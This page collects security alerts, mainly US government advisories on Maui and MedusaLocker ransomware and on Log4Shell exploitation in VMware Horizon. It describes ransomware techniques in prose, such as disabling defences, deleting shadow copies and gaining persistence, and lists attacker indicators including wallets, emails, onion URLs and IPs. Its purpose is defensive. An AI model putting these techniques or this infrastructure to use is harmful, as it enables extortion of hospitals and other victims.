Security Alerts
Cisco Unified Communications Products Cross-Site Scripting Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20815
Cisco Unified Communications Products Cross-Site Scripting Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20800
AA22-187A: North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector
Summary
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury (Treasury) are releasing this joint Cybersecurity Advisory (CSA) to provide information on Maui ransomware, which has been used by North Korean state-sponsored cyber actors since at least May 2021 to target Healthcare and Public Health (HPH) Sector organizations.
This joint CSA provides information—including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs)—on Maui ransomware obtained from FBI incident response activities and industry analysis of a Maui sample. The FBI, CISA, and Treasury urge HPH Sector organizations as well as other critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from ransomware operations. Victims of Maui ransomware should report the incident to their local FBI field office or CISA.
The FBI, CISA, and Treasury highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks. Note: in September 2021, Treasury issued an updated advisory highlighting the sanctions risks associated with ransomware payments and the proactive steps companies can take to mitigate such risks. Specifically, the updated advisory encourages U.S. entities to adopt and improve cybersecurity practices and report ransomware attacks to, and fully cooperate with, law enforcement. The updated advisory states that when affected parties take these proactive steps, Treasury’s Office of Foreign Assets Control (OFAC) would be more likely to resolve apparent sanctions violations involving ransomware attacks with a non-public enforcement response.
For more information on state-sponsored North Korean malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.
Download the PDF version of this report: pdf, 553 kb.
Technical DetailsSince May 2021, the FBI has observed and responded to multiple Maui ransomware incidents at HPH Sector organizations. North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services. In some cases, these incidents disrupted the services provided by the targeted HPH Sector organizations for prolonged periods. The initial access vector(s) for these incidents is unknown.
Maui RansomwareMaui ransomware (maui.exe) is an encryption binary. According to industry analysis of a sample of Maui (SHA256: 5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e) provided in Stairwell Threat Report: Maui Ransomware—the ransomware appears to be designed for manual execution [TA0002] by a remote actor. The remote actor uses command-line interface [T1059.008] to interact with the malware and to identify files to encrypt.
Maui uses a combination of Advanced Encryption Standard (AES), RSA, and XOR encryption to encrypt [T1486] target files:
- Maui encrypts target files with AES 128-bit encryption. Each encrypted file has a unique AES key, and each file contains a custom header with the file’s original path, allowing Maui to identify previously encrypted files. The header also contains encrypted copies of the AES key.
- Maui encrypts each AES key with RSA encryption.
- Maui loads the RSA public (maui.key) and private (maui.evd) keys in the same directory as itself.
- Maui encodes the RSA public key (maui.key) using XOR encryption. The XOR key is generated from hard drive information (\\.\PhysicalDrive0).
During encryption, Maui creates a temporary file for each file it encrypts using GetTempFileNameW(). Maui uses the temporary to stage output from encryption. After encrypting files, Maui creates maui.log, which contains output from Maui execution. Actors likely exfiltrate [TA0010] maui.log and decrypt the file using associated decryption tools.
See Stairwell Threat Report: Maui Ransomware for additional information on Maui ransomware, including YARA rules and a key extractor.
Indicators of CompromiseSee table 1 for Maui ransomware IOCs obtained from FBI incident response activities since May 2021.
Table 1: Maui Ransomware IOCs
Indicator Type Value Filename maui.exe maui.log maui.key maui.evd aui.exe MD5 Hash 4118d9adce7350c3eedeb056a3335346 9b0e7c460a80f740d455a7521f0eada1 fda3a19afa85912f6dc8452675245d6 2d02f5499d35a8dffb4c8bc0b7fec5c2 c50b839f2fc3ce5a385b9ae1c05def3a a452a5f693036320b580d28ee55ae2a3 a6e1efd70a077be032f052bb75544358 802e7d6e80d7a60e17f9ffbd62fcbbeb SHA256 Hash 5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e 45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78 56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19 830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570 458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456 99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f 3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878 87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6
Attribution to North Korean State-Sponsored Cyber Actors
The FBI assesses North Korean state-sponsored cyber actors have deployed Maui ransomware against Healthcare and Public Health Sector organizations. The North Korean state-sponsored cyber actors likely assume healthcare organizations are willing to pay ransoms because these organizations provide services that are critical to human life and health. Because of this assumption, the FBI, CISA, and Treasury assess North Korean state-sponsored actors are likely to continue targeting HPH Sector organizations.
MitigationsThe FBI, CISA, and Treasury urge HPH Sector organizations to:
- Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.
- Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
- Turn off network device management interfaces such as Telnet, SSH, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
- Secure personal identifiable information (PII)/patient health information (PHI) at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TPS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
- Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
- Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
- Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
- Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
- Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
In addition, the FBI, CISA, and Treasury urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.
Preparing for Ransomware- Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
- Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
- Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
- Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
- Refer to the National Conference of State Legislatures: Security Breach Notification Laws for information on each state’s data breach laws.
- For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and, in some cases, the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
- See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.
- Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
- Install updates for operating systems, software, and firmware as soon as they are released. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Regularly check for software updates and end-of-life notifications and prioritize patching known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
- If you use Remote Desktop Protocol (RDP), or other potentially risky services, secure and monitor them closely.
- Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
- Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389).
- Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
- Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
- Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established.
- Open document readers in protected viewing modes to help prevent active content from running.
- Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
- Require MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
- Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and National Institute of Standards and Technology (NIST) Special Publication 800-63B: Digital Identity Guidelines for more information.
- Require administrator credentials to install software.
- Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
- Install and regularly update antivirus and antimalware software on all hosts.
- Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
- Consider adding an email banner to messages coming from outside your organizations.
- Disable hyperlinks in received emails.
If a ransomware incident occurs at your organization:
- Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
- Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
- Follow the notification requirements as outlined in your cyber incident response plan.
- Report incidents to the FBI at a local FBI Field Office, CISA at us-cert.cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
- Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.
Note: the FBI, CISA, and Treasury strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.
Request for InformationThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. As stated above, the FBI discourages paying ransoms. Payment does not guarantee files will be recovered and may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, the FBI understands that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees, and customers. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and Treasury urge you to promptly report ransomware incidents to the FBI at a local FBI Field Office, CISA at us-cert.cisa.gov/report, or the USSS at a USSS Field Office. Doing so provides the U.S. Government with critical information needed to prevent future attacks by identifying and tracking ransomware actors and holding them accountable under U.S. law.
Resources- For more information and resources on protecting against and responding to ransomware, refer to StopRansomware.gov, a centralized, U.S. whole-of-government webpage providing ransomware resources and alerts.
- CISA’s Ransomware Readiness Assessment is a no-cost self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.
- A guide that helps organizations mitigate a ransomware attack and provides a Ransomware Response Checklists: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
- The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
The FBI, CISA, and Treasury would like to thank Stairwell for their contributions to this CSA.
Contact InformationTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov.
Revisions- July 6, 2022: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
AA22-181A: #StopRansomware: MedusaLocker
Summary
Actions to take today to mitigate cyber threats from ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce multifactor authentication.
Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) are releasing this CSA to provide information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim's data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and the developer, who receives the remainder.
Download the PDF version of this report: pdf, 633 kb
Technical DetailsMedusaLocker ransomware actors most often gain access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations [T1133]. Actors also frequently use email phishing and spam email campaigns—directly attaching the ransomware to the email—as initial intrusion vectors [T1566].
MedusaLocker ransomware uses a batch file to execute PowerShell script invoke-ReflectivePEInjection [T1059.001]. This script propagates MedusaLocker throughout the network by editing the EnableLinkedConnections value within the infected machine’s registry, which then allows the infected machine to detect attached hosts and networks via Internet Control Message Protocol (ICMP) and to detect shared storage via Server Message Block (SMB) Protocol.
MedusaLocker then:
- Restarts the LanmanWorkstation service, which allows registry edits to take effect.
- Kills the processes of well-known security, accounting, and forensic software.
- Restarts the machine in safe mode to avoid detection by security software [T1562.009].
- Encrypts victim files with the AES-256 encryption algorithm; the resulting key is then encrypted with an RSA-2048 public key [T1486].
- Runs every 60 seconds, encrypting all files except those critical to the functionality of the victim’s machine and those that have the designated encrypted file extension.
- Establishes persistence by copying an executable (svhost.exe or svhostt.exe) to the %APPDATA%\Roaming directory and scheduling a task to run the ransomware every 15 minutes.
- Attempts to prevent standard recovery techniques by deleting local backups, disabling startup recovery options, and deleting shadow copies [T1490].
MedusaLocker actors place a ransom note into every folder containing a file with the victim's encrypted data. The note outlines how to communicate with the MedusaLocker actors, typically providing victims one or more email address at which the actors can be reached. The size of MedusaLocker ransom demands appears to vary depending on the victim’s financial status as perceived by the actors.
Ransom Note File Names how_to_ recover_data.html how_to_recover_data.html.marlock01 instructions.html READINSTRUCTION.html !!!HOW_TO_DECRYPT!!! How_to_recovery.txt readinstructions.html readme_to_recover_files recovery_instructions.html HOW_TO_RECOVER_DATA.html recovery_instruction.html
Payment Wallets 14oxnsSc1LZ5M2cPZeQ9rFnXqEvPCnZikc 1DRxUFhvJjGUdojCzMWSLmwx7Qxn79XbJq 18wRbb94CjyTGkUp32ZM7krCYCB9MXUq42 1AbRxRfP6yHePpi7jmDZkS4Mfpm1ZiatH5 1Edcufenw1BB4ni9UadJpQh9LVx9JGtKpP 1DyMbw6R9PbJqfUSDcK5729xQ57yJrE8BC 184ZcAoxkvimvVZaj8jZFujC7EwR3BKWvf 14oH2h12LvQ7BYBufcrY5vfKoCq2hTPoev bc1qy34v0zv6wu0cugea5xjlxagsfwgunwkzc0xcjj bc1q9jg45a039tn83jk2vhdpranty2y8tnpnrk9k5q bc1qz3lmcw4k58n79wpzm550r5pkzxc2h8rwmmu6xm 1AereQUh8yjNPs9Wzeg1Le47dsqC8NNaNM 1DeNHM2eTqHp5AszTsUiS4WDHWkGc5UxHf 1HEDP3c3zPwiqUaYuWZ8gBFdAQQSa6sMGw 1HdgQM9bjX7u7vWJnfErY4MWGBQJi5mVWV 1nycdn9ebxht4tpspu4ehpjz9ghxlzipll 12xd6KrWVtgHEJHKPEfXwMVWuFK4k1FCUF 1HZHhdJ6VdwBLCFhdu7kDVZN9pb3BWeUED 1PormUgPR72yv2FRKSVY27U4ekWMKobWjg 14cATAzXwD7CQf35n8Ea5pKJPfhM6jEHak 1PopeZ4LNLanisswLndAJB1QntTF8hpLsD
Email Addresses willyhill1960@tutanota[.]com unlockfile@cock[.]li zlo@keem[.]ne unlockmeplease@airmail[.]cc zlo@keemail[.]me unlockmeplease@protonmail[.]com zlo@tfwno[.]gf willyhill1960@protonmail[.]com support@ypsotecs[.]com support@imfoodst[.]com
Email Addresses traceytevin@protonmail[.]com support@itwgset[.]com unlock_file@aol[.]com support@novibmaker[.]com unlock_file@outlook[.]com support@securycasts[.]com support@exoprints[.]com rewmiller-1974@protonmail[.]com support@exorints[.]com rpd@keemail[.]me support@fanbridges[.]com soterissylla@wyseil[.]com support@faneridges[.]com support@careersill[.]com perfection@bestkoronavirus[.]com karloskolorado@tutanota[.]com pool1256@tutanota[.]com kevynchaz@protonmail[.]com rapid@aaathats3as[.]com korona@bestkoronavirus[.]com rescuer@tutanota[.]com lockPerfection@gmail[.]com ithelp01@decorous[.]cyou lockperfection@gmail[.]com ithelp01@wholeness[.]business mulierfagus@rdhos[.]com ithelp02@decorous[.]cyou [rescuer]@cock[.]li ithelp02@wholness[.]business 107btc@protonmail[.]com ithelpresotre@outlook[.]com 33btc@protonmail[.]com cmd@jitjat[.]org 777decoder777@protonmail[.]com coronaviryz@gmail[.]com 777decoder777@tfwno[.]gf dec_helper@dremno[.]com andrewmiller-1974@protonmail[.]com dec_helper@excic[.]com angelomartin-1980@protonmail[.]com dec_restore@prontonmail[.]com ballioverus@quocor[.]com dec_restore1@outlook[.]com beacon@jitjat[.]org bitcoin@sitesoutheat[.]com beacon@msgsafe[.]io briansalgado@protonmail[.]com best666decoder@tutanota[.]com bugervongir@outlook[.]com bitcoin@mobtouches[.]com best666decoder@protonmail[.]com encrypt2020@outlook[.]com decoder83540@cock[.]li fast-help@inbox[.]lv decra2019@gmail[.]com fuc_ktheworld1448@outlook[.]com diniaminius@winrof[.]com fucktheworld1448@cock[.]li dirhelp@keemail[.]me gartaganisstuffback@gmail[.]com
Email Addresses emaila.elaich@iav.ac[.]ma gavingonzalez@protonmail[.]com emd@jitjat[.]org gsupp@onionmail[.]org encrypt2020@cock[.]li gsupp@techmail[.]info best666decoder@protonmail[.]com helper@atacdi[.]com ithelp@decorous[.]cyou helper@buildingwin[.]com ithelp@decorous[.]cyoum helprestore@outlook[.]com ithelp@wholeness[.]business helptorestore@outlook[.]com
TOR Addresses http://gvlay6u4g53rxdi5.onion/6-iSm1B1Ehljh8HYuXGym4Xyu1WdwsR2Av-6tXiw1BImsqoLh7pd207Rl6XYoln7sId http://gvlay6u4g53rxdi5.onion/8-grp514hncgblilsjtd32hg6jtbyhlocr5pqjswxfgf2oragnl3pqno6fkqcimqin http://gvlay6y4g53rxdi5.onion/21-8P4ZLCsMETPaLw9MkSlXJsNZWdHe0rxjt-XmBgZLWlm5ULGFCOJFuVdEymmxysofwu http://gvlay6u4g53rxdi5.onion/2l-8P4ZLCsMTPaLw9MkSlXJsNZWdHeOrxjtE9lck1MuXPYo29daQys6gomZZXUImN7Z http://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-DcaE9HeHywqSHvdcIwOndCS4PuWASX8g http://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-kB4rQXGKyxGiLyw7YDsMKSBjyfdwcyxo http://gvlay6u4g53rxdi5.onion/21-8P4ZLCsMTPaLw9MkSlXJsNZWdHe0rxjt-bET6JbB9vEMZ7qYBPqUMCxOQExFx4iOi http://gvlay6u4g53rxdi5. onion/8-MO0Q7O97Hgxvm1YbD7OMnimImZJXEWaG-RbH4TvdwVTGQB3X6VOUOP3lgO6YOJEOW http://gvlay6u4g53rxdi5.onion/8-gRp514hncgb1i1sjtD32hG6jTbUh1ocR-Uola2Fo30KTJvZX0otYZgTh5txmKwUNe http://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-OWQwD1w1Td7hY7IGUUjxmHMoFSQW6blg http://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-uGHwkkWCoUtBbZWN50sSS4Ds8RABkrKy http://gvlay6u4g53rxdi5.onion/21-E6UQFCEuCn4KvtAh4TonRTpyHqFo6F6L-Tj3PRnQlpHc9OftRVDGAWUulvE80yZbc http://gvlay6u4g53rxdi5.onion/8-Ww5sCBhsL8eM4PeAgsfgfa9lrqa81r31-tDQRZCAUe4164X532j9Ky16IBN9StWTH http://gvlay6u4g53rxdi5.onion/21-wIq5kK9gGKiTmyups1U6fABj1VnXIYRB-I5xek6PG2EbWlPC7C1rXfsqJBlWlFFfY qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion http://medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion/leakdata/paigesmusic-leakdata-closed-part1
Disclaimer: Many of these observed IP addresses are several years old and have been historically linked to MedusaLocker ransomware. We recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.
IP Address Last Observed 195.123.246.138 Nov-2021 138.124.186.221 Nov-2021 159.223.0.9 Nov-2021 45.146.164.141 Nov-2021 185.220.101.35 Nov-2021 185.220.100.249 Sep-2021 50.80.219.149 Sep-2021 185.220.101.146 Sep-2021 185.220.101.252 Sep-2021 179.60.150.97 Sep-2021 84.38.189.52 Sep-2021 94.232.43.63 Jul-2021 108.11.30.103 Apr-2021 194.61.55.94 Apr-2021 198.50.233.202 Apr-2021 40.92.90.105 Jan-2021 188.68.216.23 Dec-2020 87.251.75.71 Dec-2020 196.240.57.20 Oct-2020 198.0.198.5 Aug-2020 194.5.220.122 Mar-2020 194.5.250.124 Mar-2020 194.5.220.124 Mar-2020 104.210.72.161 Nov-2019MITRE ATT&CK Techniques
MedusaLocker actors use the ATT&CK techniques listed in Table 1.
Table 1: MedusaLocker Actors ATT&CK Techniques for Enterprise
Initial Access Technique Title ID Use External Remote Services T1133 MedusaLocker actors gained access to victim devices through vulnerable RDP configurations. Phishing T1566 MedusaLocker actors used phishing and spearphishing to obtain access to victims' networks. Execution Technique Title ID Use Command and Scripting Interpreter: PowerShellT1059.001
MedusaLocker actors may abuse PowerShell commands and scripts for execution. Defense Evasion Technique Title ID Use Impair Defenses: Safe Mode BootT1562.009
MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Impact Technique Title ID Use Data Encrypted for Impact T1486 MedusaLocker actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. Inhibit System Recovery T1490 MedusaLocker actors may deny access to operating systems containing features that can help fix corrupted systems, such as backup catalog, volume shadow copies, and automatic repair.Mitigations
- Implement a recovery plan that maintains and retains multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).
- Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.
- Regularly back up data and password protect backup copies stored offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
- Install, regularly update, and enable real time detection for antivirus software on all hosts.
- Install updates for operating systems, software, and firmware as soon as possible.
- Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
- Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.
- Disable unused ports.
- Consider adding an email banner to emails received from outside your organization.
- Disable hyperlinks in received emails.
- Enforce multifactor authentication (MFA).
- Use National Institute of Standards and Technology (NIST) standards for developing and managing password policies:
- Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.
- Store passwords in hashed format using industry-recognized password managers.
- Add password user “salts” to shared login credentials.
- Avoid reusing passwords.
- Implement multiple failed login attempt account lockouts.
- Disable password “hints”.
- Refrain from requiring password changes unless there is evidence of password compromise. Note: NIST guidance suggests favoring longer passwords and no longer require regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
- Require administrator credentials to install software.
- Only use secure networks; avoid using public Wi-Fi networks.
- Consider installing and using a virtual private network (VPN) to establish secure remote connections.
- Focus on cybersecurity awareness and training. Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities, such as ransomware and phishing scams.
Resources
- Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
- Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide
- No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment
- To report an incident and request technical assistance, contact CISA at cisaservicedesk@cisa.dhs.gov or 888-282-0870, or FBI through a local field office.
- Financial Institutions must ensure compliance with any applicable Bank Secrecy Act requirements, including suspicious activity reporting obligations. Indicators of compromise (IOCs), such as suspicious email addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. For more information on mandatory and voluntary reporting of cyber events via SARs, see FinCEN Advisory FIN-2016-A005, Advisory to Financial Institutions on Cyber-Events and Cyber-Enabled Crime, October 25, 2016; and FinCEN Advisory FIN-2021-A004, Advisory on Ransomware and the Use of the Financial System to Facilitate Ransom Payments, November 8, 2021, which updates FinCEN Advisory FIN-2020-A006.
- The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field-offices. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To report incidents and anomalous activity or to request incident response resources or technical assistance related to this threat, contact CISA at report@cisa.gov.
Revisions- June 30, 2022: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
Cisco Adaptive Security Device Manager Information Disclosure Vulnerability
Security Impact Rating: Medium
CVE: CVE-2022-20651
AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
Summary
Actions to take today:
• Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
• Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims’ networks.
CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA.
See the list below to download copies of IOCs:
Download the pdf version of this report: [pdf, 483 kb]
Technical DetailsNote: this advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix A for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques.
Log4Shell is a remote code execution vulnerability affecting the Apache® Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG. The vulnerability enables malicious cyber actors to submit a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. The request allows the malicious actors to take full control of the affected system. (For more information on Log4Shell, see CISA’s Apache Log4j Vulnerability Guidance webpage and VMware advisory VMSA-2021-0028.13.)
VMware made fixes available in December 2021 and confirmed exploitation in the wild on December 10, 2021.[1] Since December 2021, multiple cyber threat actor groups have exploited [T1190] Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial access [TA0001] to networks.
After obtaining access, some actors implanted loader malware on compromised systems with embedded executables enabling remote C2. These actors connected to known malicious IP address 104.223.34[.]198.[2] This IP address uses a self-signed certificate CN: WIN-P9NRMH5G6M8. In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the victim’s network.
The sections below provide information CISA and CGCYBER obtained during incident response activities at two related confirmed compromises.
Victim 1CGCYBER conducted a proactive threat-hunting engagement at an organization (Victim 1) compromised by actors exploiting Log4Shell in VMware Horizon. After obtaining access, threat actors uploaded malware, hmsvc.exe, to a compromised system. During malware installation, connections to IP address 104.223.34[.]198 were observed.
